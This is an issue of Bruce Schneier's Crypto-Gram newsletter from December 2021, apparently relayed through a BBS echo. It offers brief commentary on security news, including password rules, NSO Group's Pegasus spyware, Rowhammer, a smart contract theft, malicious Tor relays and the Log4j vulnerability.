Crypto-Gram
December 15, 2021
by Bruce Schneier
Fellow and Lecturer, Harvard Kennedy School schneier@schneier.com
https://www.schneier.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on security: computer and otherwise.
For back issues, or to subscribe, visit Crypto-Gram's web page.
Read this issue on the web
These same essays and news items appear in the Schneier on Security blog, along
with a lively and intelligent comment section. An RSS feed is available.
** *** ***** ******* *********** *************
In this issue:
If these links don't work in your email client, try reading this issue of
Crypto-
Gram on the web.
Securing Your Smartphone
Why I Hate Password Rules
Wire Fraud Scam Upgraded with Bitcoin Is Microsoft Stealing People�s Bookmarks?
New Rowhammer Technique
�Crypto� Means �Cryptography,� Not �Cryptocurrency�
Apple Sues NSO Group
Proposed UK Law Bans Default Passwords Intel Is Maintaining Legacy Technology
for Security Research Smart Contract Bug Results in $31 Million Loss Testing
Faraday Cages
Thieves Using AirTags to �Follow� Cars Someone Is Running Lots of Tor Relays New
German Government is Pro-Encryption and Anti-Backdoors Google Shuts Down
Glupteba Botnet, Sues Operators Law Enforcement Access to Chat Data and Metadata
NSO Group�s Pegasus Spyware Used Against US State Department Officials
On the Log4j Vulnerability
Upcoming Speaking Engagements
** *** ***** ******* *********** *************
Securing Your Smartphone
[2021.11.15] This is part 3 of Sean Gallagher�s advice for �securing your
digital
life.�
** *** ***** ******* *********** *************
Why I Hate Password Rules
[2021.11.16] The other day, I was creating a new account on the web. It was
financial in nature, which means it gets one of my most secure passwords. I used
Password Safe to generate this 16-character alphanumeric password:
:s^Twd.J;3hzg=Q~
Which was rejected by the site, because it didn�t meet its password security
rules.
It took me a minute to figure out what was wrong with it. The site wanted at
least two numbers.
Sheesh.
Okay, that�s not really why I don�t like password rules. I don�t like them
because they�re all different. Even if someone has a strong password generation
system, it is likely that whatever they come up with won�t pass somebody�s
ruleset.
** *** ***** ******* *********** *************
Wire Fraud Scam Upgraded with Bitcoin
[2021.11.16] The FBI has issued a bulletin describing a bitcoin variant of a
wire
fraud scam:
As the agency describes it, the scammer will contact their victim and somehow
convince them that they need to send money, either with promises of love,
further
riches, or by impersonating an actual institution like a bank or utility
company.
After the mark is convinced, the scammer will have them get cash (sometimes out
of investment or retirement accounts), and head to an ATM that sells
cryptocurrencies and supports reading QR codes. Once the victim�s there, they�ll
scan a QR code that the scammer sent them, which will tell the machine to send
any crypto purchased to the scammer�s address. Just like that, the victim loses
their money, and the scammer has successfully exploited them.
[...]
The �upgrade� (as it were) for scammers with the crypto ATM method is two-fold:
it can be less friction than sending a wire transfer, and at the end the scammer
has cryptocurrency instead of fiat. With wire transfers, you have to fill out a
form, and you may give that form to an actual person (who could potentially vibe
check you). Using the ATM method, there�s less time to reflect on the fact that
you�re about to send money to a stranger. And, if you�re a criminal trying to
get
your hands on Bitcoin, you won�t have to teach your targets how to buy coins on
the internet and transfer them to another wallet -- they probably already know
how to use an ATM and scan a QR code.
** *** ***** ******* *********** *************
Is Microsoft Stealing People�s Bookmarks?
[2021.11.17] I received email from two people who told me that Microsoft Edge
enabled synching without warning or consent, which means that Microsoft sucked
up
all of their bookmarks. Of course they can turn synching off, but it�s too late.
Has this happened to anyone else, or was this user error of some sort? If this
is
real, can some reporter write about it?
(Not that �user error� is a good justification. Any system where making a simple
mistake means that you�ve forever lost your privacy isn�t a good one. We see
this
same situation with sharing contact lists with apps on smartphones. Apps will
repeatedly ask, and only need you to accidentally click �okay� once.)
EDITED TO ADD: It�s actually worse than I thought. Edge urges users to store
passwords, ID numbers, and even passport numbers, all of which get uploaded to
Microsoft by default when synch is enabled.
** *** ***** ******* *********** *************
New Rowhammer Technique
[2021.11.19] Rowhammer is an attack technique involving accessing -- that�s
�hammering� -- rows of bits in memory, millions of times per second, with the
intent of causing bits in neighboring rows to flip. This is a side-channel
attack, and the result can be all sorts of mayhem.
Well, there is a new enhancement:
All previous Rowhammer attacks have hammered rows with uniform patterns, such as
single-sided, double-sided, or n-sided. In all three cases, these �aggressor�
rows -- meaning those that cause bitflips in nearby �victim� rows -- are
accessed
the same number of times.
Research published on Monday presented a new Rowhammer technique. It uses non-
uniform patterns that access two or more aggressor rows with different
frequencies. The result: all 40 of the randomly selected DIMMs in a test pool
experienced bitflips, up from 13 out of 42 chips tested in previous work from
the
same researchers.
[...]
The non-uniform patterns work against Target Row Refresh. Abbreviated as TRR,
the
mitigation works differently from vendor to vendor but generally tracks the
number of times a row is accessed and recharges neighboring victim rows when
there are signs of abuse. The neutering of this defense puts further pressure on
chipmakers to mitigate a class of attacks that many people thought more recent
types of memory chips were resistant to.
** *** ***** ******* *********** *************
�Crypto� Means �Cryptography,� Not �Cryptocurrency�
[2021.11.22] I have long been annoyed that the word �crypto� has been co-opted
by
the blockchain people, and no longer refers to �cryptography.� I�m not the only
one.
** *** ***** ******* *********** *************
Apple Sues NSO Group
[2021.11.24] Piling more on NSO Group�s legal troubles, Apple is suing it:
The complaint provides new information on how NSO Group infected victims�
devices
with its Pegasus spyware. To prevent further abuse and harm to its users, Apple
is also seeking a permanent injunction to ban NSO Group from using any Apple
software, services, or devices.
NSO Group�s Pegasus spyware is favored by totalitarian governments around the
world, who use it to hack Apple phones and computers.
More news:
Apple�s legal complaint provides new information on NSO Group�s FORCEDENTRY, an
exploit for a now-patched vulnerability previously used to break into a victim�s
Apple device and install the latest version of NSO Group�s spyware product,
Pegasus. The exploit was originally identified by the Citizen Lab, a research
group at the University of Toronto.
The spyware was used to attack a small number of Apple users worldwide with
dangerous malware and spyware. Apple�s lawsuit seeks to ban NSO Group from
further harming individuals by using Apple�s products and services. The lawsuit
also seeks redress for NSO Group�s flagrant violations of US federal and state
law, arising out of its efforts to target and attack Apple and its users.
NSO Group and its clients devote the immense resources and capabilities of
nation-states to conduct highly targeted cyberattacks, allowing them to access
the microphone, camera, and other sensitive data on Apple and Android devices.
To
deliver FORCEDENTRY to Apple devices, attackers created Apple IDs to send
malicious data to a victim�s device -- allowing NSO Group or its clients to
deliver and install Pegasus spyware without a victim�s knowledge. Though misused
to deliver FORCEDENTRY, Apple servers were not hacked or compromised in the
attacks.
This follows in the footsteps of Facebook, which is also suing NSO Group and
demanding a similar prohibition. And while the idea of the intermediary suing
the
attacker, and not the victim, is somewhat novel, I think it makes a lot of
sense.
I have a law journal article about to be published with Jon Penney on the
Facebook case.
EDITED TO ADD (12/14): Supplemental brief.
** *** ***** ******* *********** *************
Proposed UK Law Bans Default Passwords
[2021.11.26] Following California�s lead, a new UK law would ban default
passwords in IoT devices.
EDITED TO ADD (12/12): Commentary.
EDITED TO ADD (12/14): A draft of the bill.
** *** ***** ******* *********** *************
Intel Is Maintaining Legacy Technology for Security Research
[2021.11.30] Interesting:
Intel�s issue reflects a wider concern: Legacy technology can introduce
cybersecurity weaknesses. Tech makers constantly improve their products to take
advantage of speed and power increases, but customers don�t always upgrade at
the
same pace. This creates a long tail of old products that remain in widespread
use, vulnerable to attacks.
Intel�s answer to this conundrum was to create a warehouse and laboratory in
Costa Rica, where the company already had a research-and-development lab, to
store the breadth of its technology and make the devices available for remote
testing. After planning began in mid-2018, the Long-Term Retention Lab was up
and
running in the second half of 2019.
The warehouse stores around 3,000 pieces of hardware and software, going back
about a decade. Intel plans to expand next year, nearly doubling the space to
27,000 square feet from 14,000, allowing the facility to house 6,000 pieces of
computer equipment.
Intel engineers can request a specific machine in a configuration of their
choice. It is then assembled by a technician and accessible through cloud
services. The lab runs 24 hours a day, seven days a week, typically with about
25
engineers working any given shift.
Slashdot thread.
** *** ***** ******* *********** *************
Smart Contract Bug Results in $31 Million Loss
[2021.12.02] A hacker stole $31 million from the blockchain company MonoX
Finance
, by exploiting a bug in software the service uses to draft smart contracts.
Specifically, the hack used the same token as both the tokenIn and tokenOut,
which are methods for exchanging the value of one token for another. MonoX
updates prices after each swap by calculating new prices for both tokens. When
the swap is completed, the price of tokenInthat is, the token sent by the
userdecreases and the price of tokenOutor the token received by the
userincreases.
By using the same token for both tokenIn and tokenOut, the hacker greatly
inflated the price of the MONO token because the updating of the tokenOut
overwrote the price update of the tokenIn. The hacker then exchanged the token
for $31 million worth of tokens on the Ethereum and Polygon blockchains.
The article goes on to talk about how common these sorts of attacks are. The
basic problem is that the code is the ultimate authority -- there is no
adjudication protocol -- so if there�s a vulnerability in the code, there is no
recourse. And, of course, there are lots of vulnerabilities in code.
To me, this is reason enough never to use smart contracts for anything
important.
Human-based adjudication systems are not useless pre-Internet human baggage,
they�re vital.
** *** ***** ******* *********** *************
Testing Faraday Cages
[2021.12.03] Matt Blaze tested a variety of Faraday cages for phones, both
commercial and homemade.
The bottom line:
A quick and likely reliable �go/no go test� can be done with an Apple AirTag and
an iPhone: drop the AirTag in the bag under test, and see if the phone can
locate
it and activate its alarm (beware of caching in the FindMy app when doing this).
This test won�t tell you the exact attenuation level, of course, but it will
tell
you if the attenuation is sufficient for most practical purposes. It can also
detect whether an otherwise good bag has been damaged and compromised.
At least in the frequency ranges I tested, two commercial Faraday pouches (the
EDEC OffGrid and Mission Darkness Window pouches) yielded excellent performance
sufficient to provide assurance of signal isolation under most real-world
circumstances. None of the makeshift solutions consistently did nearly as well,
although aluminum foil can, under ideal circumstances (that are difficult to
replicate) sometimes provide comparable levels of attenuation.
** *** ***** ******* *********** *************
Thieves Using AirTags to �Follow� Cars
[2021.12.06] From Ontario and not surprising:
Since September 2021, officers have investigated five incidents where suspects
have placed small tracking devices on high-end vehicles so they can later locate
and steal them. Brand name �air tags� are placed in out-of-sight areas of the
target vehicles when they are parked in public places like malls or parking
lots.
Thieves then track the targeted vehicles to the victim�s residence, where they
are stolen from the driveway.
Thieves typically use tools like screwdrivers to enter the vehicles through the
driver or passenger door, while ensuring not to set off alarms. Once inside, an
electronic device, typically used by mechanics to reprogram the factory setting,
is connected to the onboard diagnostics port below the dashboard and programs
the
vehicle to accept a key the thieves have brought with them. Once the new key is
programmed, the vehicle will start and the thieves drive it away.
I�m not sure if there�s anything that can be done:
When Apple first released AirTags earlier this year, concerns immediately sprung
up about nefarious use cases for the covert trackers. Apple responded with a
slew
of anti-stalking measures, but those are more intended for keeping people safe
than cars. An AirTag away from its owner will sound an alarm, letting anyone
nearby know that it�s been left behind, but it can take up to 24 hours for that
alarm to go off -- more than enough time to nab a car in the dead of night.
** *** ***** ******* *********** *************
Someone Is Running Lots of Tor Relays
[2021.12.07] Since 2017, someone is running about a thousand -- 10% of the total
-- Tor servers in an attempt to deanonymize the network:
Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor
has constantly added servers with no contact details to the Tor network in
industrial quantities, operating servers in the realm of hundreds at any given
point.
The actor�s servers are typically located in data centers spread all over the
world and are typically configured as entry and middle points primarily,
although
KAX17 also operates a small number of exit points.
Nusenu said this is strange as most threat actors operating malicious Tor relays
tend to focus on running exit points, which allows them to modify the user�s
traffic. For example, a threat actor that Nusenu has been tracking as BTCMITM20
ran thousands of malicious Tor exit nodes in order to replace Bitcoin wallet
addresses inside web traffic and hijack user payments.
KAX17�s focus on Tor entry and middle relays led Nusenu to believe that the
group, which he described as �non-amateur level and persistent,� is trying to
collect information on users connecting to the Tor network and attempting to map
their routes inside it.
In research published this week and shared with The Record, Nusenu said that at
one point, there was a 16% chance that a Tor user would connect to the Tor
network through one of KAX17�s servers, a 35% chance they would pass through one
of its middle relays, and up to 5% chance to exit through one.
Slashdot thread.
** *** ***** ******* *********** *************
New German Government is Pro-Encryption and Anti-Backdoors
[2021.12.08] I hope this is true:
According to Jens Zimmermann, the German coalition negotiations had made it
�quite clear� that the incoming government of the Social Democrats (SPD), the
Greens and the business-friendly liberal FDP would reject �the weakening of
encryption, which is being attempted under the guise of the fight against child
abuse� by the coalition partners.
Such regulations, which are already enshrined in the interim solution of the
ePrivacy Regulation, for example, �diametrically contradict the character of the
coalition agreement� because secure end-to-end encryption is guaranteed there,
Zimmermann said.
Introducing backdoors would undermine this goal of the coalition agreement, he
added.
I have written about this.
** *** ***** ******* *********** *************
Google Shuts Down Glupteba Botnet, Sues Operators
[2021.12.09] Google took steps to shut down the Glupteba botnet, at least for
now. (The botnet uses the bitcoin blockchain as a backup command-and-control
mechanism, making it hard to get rid of it permanently.) So Google is also suing
the botnet�s operators.
It�s an interesting strategy. Let�s see if it�s successful.
** *** ***** ******* *********** *************
Law Enforcement Access to Chat Data and Metadata
[2021.12.10] A January 2021 FBI document outlines what types of data and
metadata
can be lawfully obtained by the FBI from messaging apps. Rolling Stone broke the
story and it�s been written about elsewhere.
I don�t see a lot of surprises in the document. Lots of apps leak all sorts of
metadata: iMessage and WhatsApp seem to be the worst. Signal protects the most
metadata. End-to-end encrypted message content can be available if the user
uploads it to an unencrypted backup server.
EDITED TO ADD (12/13): Here�s a more legible copy of the text.
** *** ***** ******* *********** *************
NSO Group�s Pegasus Spyware Used Against US State Department Officials
[2021.12.13] NSO Group�s descent into Internet pariah status continues. Its
Pegasus spyware was used against nine US State Department employees. We don�t
know which NSO Group customer trained the spyware on the US. But the company
does:
NSO Group said in a statement on Thursday that it did not have any indication
their tools were used but canceled access for the relevant customers and would
investigate based on the Reuters inquiry.
�If our investigation shall show these actions indeed happened with NSO�s
tools,
such customer will be terminated permanently and legal actions will take place,�
said an NSO spokesperson, who added that NSO will also �cooperate with any
relevant government authority and present the full information we will have.�
** *** ***** ******* *********** *************
On the Log4j Vulnerability
[2021.12.14] It�s serious:
The range of impacts is so broad because of the nature of the vulnerability
itself. Developers use logging frameworks to keep track of what happens in a
given application. To exploit Log4Shell, an attacker only needs to get the
system
to log a strategically crafted string of code. From there they can load
arbitrary
code on the targeted server and install malware or launch other attacks.
Notably,
hackers can introduce the snippet in seemingly benign ways, like by sending the
string in an email or setting it as an account username.
Threat advisory from Cisco. Cloudflare found it in the wild before it was
disclosed. CISA is very concerned, saying that hundreds of millions of devices
are likely affected.
** *** ***** ******* *********** *************
Upcoming Speaking Engagements
[2021.12.14] This is a current list of where and when I am scheduled to speak:
I�m speaking at the RSA Conference 2022 in San Francisco on February 8, 2022.
I�m speaking at IT-S Now 2022 in Vienna on June 2, 2022. I�m speaking at the
14th International Conference on Cyber Conflict, CyCon 2022,
in Tallinn, Estonia on June 3, 2022. The list is maintained on this page.
** *** ***** ******* *********** *************
Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries,
analyses, insights, and commentaries on security technology. To subscribe, or to
read back issues, see Crypto-Gram's web page.
You can also read these articles on my blog, Schneier on Security.
Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and
friends who will find it valuable. Permission is also granted to reprint CRYPTO-
GRAM, as long as it is reprinted in its entirety.
Bruce Schneier is an internationally renowned security technologist, called a
security guru by the Economist. He is the author of over one dozen books --
including his latest, We Have Root -- as well as hundreds of articles, essays,
and academic papers. His newsletter and blog are read by over 250,000 people.
Schneier is a fellow at the Berkman Klein Center for Internet & Society at
Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a
board member of the Electronic Frontier Foundation, AccessNow, and the Tor
Project; and an Advisory Board Member of the Electronic Privacy Information
Center and VerifiedVoting.org. He is the Chief of Security Architecture at
Inrupt, Inc.
Copyright C 2021 by Bruce Schneier.
--- BBBS/Li6 v4.10 Toy-5
* Origin: TCOB1 at tcob1.duckdns.org BinkP / Telnet (618:500/14)
|
Computer Support/Help/Discussion... 
